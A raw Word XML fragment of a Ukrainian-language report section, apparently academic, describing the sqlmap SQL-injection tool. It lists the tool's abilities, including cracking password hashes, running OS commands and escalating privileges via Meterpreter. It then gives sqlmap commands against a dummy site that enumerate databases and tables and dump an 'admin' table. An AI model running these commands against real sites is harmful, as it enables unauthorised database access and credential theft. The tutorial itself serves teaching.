        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Підтримка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>перебору</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> користувачів, хешів паролів, привілеїв, ролей, БД, таблиць і колонок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCEC21E" w14:textId="2574493C" w:rsidR="001E6D6B" w:rsidRDefault="001E6D6B" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Автоматичне розпізнавання форматів хешів паролів і пропозиція їх злому з використанням атаки по словнику</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A3658" w14:textId="25BBF8B7" w:rsidR="001E6D6B" w:rsidRDefault="001E6D6B" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Підтримка </w:t>
      </w:r>
      <w:r w:rsidR="001B0C5C">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>отримання</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6D6B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> записів таблиць БД, діапазону записів або зазначених колонок по призначеному для користувача вибору</w:t>
      </w:r>
      <w:r w:rsidR="001B0C5C">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374152A2" w14:textId="113B18FA" w:rsidR="001B0C5C" w:rsidRDefault="00793AC2" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Користувач може вибрати також, яку інформацію отримати з бази даних;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339E6CB" w14:textId="4EE40FE8" w:rsidR="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Підтримка пошуку зазначених імен БД, зазначених таблиць по всім БД або зазначеним колонкам по всіх таблиць БД. Це корисно, наприклад, для ідентифікації таблиць, що містять користувальницькі облікові дані додатків, де колонки з відповідними іменами колонок містять такі рядки як ім'я та пароль</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E431851" w14:textId="5FD3A91E" w:rsidR="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Підтримка завантаження і вивантаження будь-якого файлу з файлової системи з сервера БД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BD4D0" w14:textId="67DB623E" w:rsidR="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Підтримка завантаження і вивантаження будь-якого файлу з файлової системи з сервера БД, коли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">програмне забезпечення баз даних </w:t>
      </w:r>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>MySQL, PostgreSQL або Microsoft SQL Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6654D1FE" w14:textId="05606773" w:rsidR="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Підтримка виконання довільних команд на ОС сервера БД і отримання їх стандартного виведення коли </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>програмне забезпечення</w:t>
      </w:r>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL, PostgreSQL або Microsoft SQL Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016E5EFB" w14:textId="35183634" w:rsidR="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="001E6D6B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Підтримка підвищення призначених для користувача привілеїв процесу бази даних через команду Metasploit 'а - </w:t>
      </w:r>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00793AC2">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B547E" w:rsidRPr="005027FB">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B547E">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[42]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA69E0" w14:textId="6CE890B3" w:rsidR="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="00793AC2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Приклади запуску </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sqlmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80D05F" w14:textId="70D82E09" w:rsidR="00793AC2" w:rsidRPr="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="00793AC2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Перебір баз даних </w:t>
      </w:r>
      <w:r w:rsidR="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">рис. </w:t>
      </w:r>
      <w:r w:rsidR="005364C9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31041359" w14:textId="5B5B8AC2" w:rsidR="00793AC2" w:rsidRDefault="00793AC2" w:rsidP="00793AC2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sqlmap -u http://www.sqldummywebsite.name/rubrika.php?id=31 –dbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79845AEE" w14:textId="77777777" w:rsidR="005364C9" w:rsidRPr="00C3144E" w:rsidRDefault="005364C9" w:rsidP="005364C9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77E5F4AD" wp14:editId="20D5C3C6">
            <wp:extent cx="3545288" cy="294312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20311" cy="3005406"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E717AE" w14:textId="43C438CE" w:rsidR="005364C9" w:rsidRPr="005364C9" w:rsidRDefault="005364C9" w:rsidP="005364C9">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.1 Перебір баз даних</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A89A4D4" w14:textId="7E9F59CC" w:rsidR="00793AC2" w:rsidRPr="00F16A64" w:rsidRDefault="00793AC2" w:rsidP="00793AC2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Побудувати список таблиць</w:t>
      </w:r>
      <w:r w:rsidR="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005364C9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рис. 2.6.8.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE1841" w14:textId="59C40150" w:rsidR="00F16A64" w:rsidRDefault="00F16A64" w:rsidP="00F16A64">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat –tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE1938" w14:textId="77777777" w:rsidR="005364C9" w:rsidRDefault="005364C9" w:rsidP="005364C9">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C4D514" wp14:editId="1CD65245">
            <wp:extent cx="4810948" cy="4463530"/>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4239" cy="4475861"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F734908" w14:textId="39EC88F6" w:rsidR="005364C9" w:rsidRPr="002F1513" w:rsidRDefault="005364C9" w:rsidP="002F1513">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.2 Отримання списку таблиць</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FDDBFE" w14:textId="1A5AAF02" w:rsidR="00F16A64" w:rsidRDefault="00F16A64" w:rsidP="00F16A64">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Показати колонки (--columns) для таблиці admin (-T admin) для бази даних laminat (-D laminat) для сайту</w:t>
      </w:r>
      <w:r w:rsidR="005364C9" w:rsidRPr="005364C9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005364C9">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">рис. 2.6.8.3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>http://www.sqldummywebsite.name/rubrika.php?id=31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780DE06C" w14:textId="578C818E" w:rsidR="00F16A64" w:rsidRDefault="00F16A64" w:rsidP="00F16A64">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin –columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4452FF40" w14:textId="59E7966B" w:rsidR="005364C9" w:rsidRDefault="005364C9" w:rsidP="005364C9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6801D798" wp14:editId="21B297E7">
            <wp:extent cx="6120130" cy="45745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4574540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3BD61E" w14:textId="34402A06" w:rsidR="005364C9" w:rsidRDefault="005364C9" w:rsidP="005364C9">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.8.</w:t>
      </w:r>
      <w:r w:rsidR="00825D25">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Отримання </w:t>
      </w:r>
      <w:r w:rsidR="00825D25">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>даних з колонок таблиці</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C1EA2" w14:textId="77777777" w:rsidR="005364C9" w:rsidRPr="00825D25" w:rsidRDefault="005364C9" w:rsidP="00825D25">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01565B03" w14:textId="6199F828" w:rsidR="00F16A64" w:rsidRDefault="00F16A64" w:rsidP="00F16A64">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Вивести дамп (--dump) для таблиці admin (-T admin) для бази даних laminat (-D laminat) для сайту http://www.sqldummywebsite.name/rubrika.php?id=31 (-u http: // www.sqldummywebsite.name/rubrika.php?id=31)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1F2C4" w14:textId="7F976FAD" w:rsidR="00F16A64" w:rsidRPr="00F16A64" w:rsidRDefault="00F16A64" w:rsidP="00F16A64">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16A64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin –dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37812E94" w14:textId="50F37D3E" w:rsidR="00F16A64" w:rsidRDefault="00F16A64" w:rsidP="00F16A64">
      <w:pPr>
        <w:pStyle w:val="a3"/>
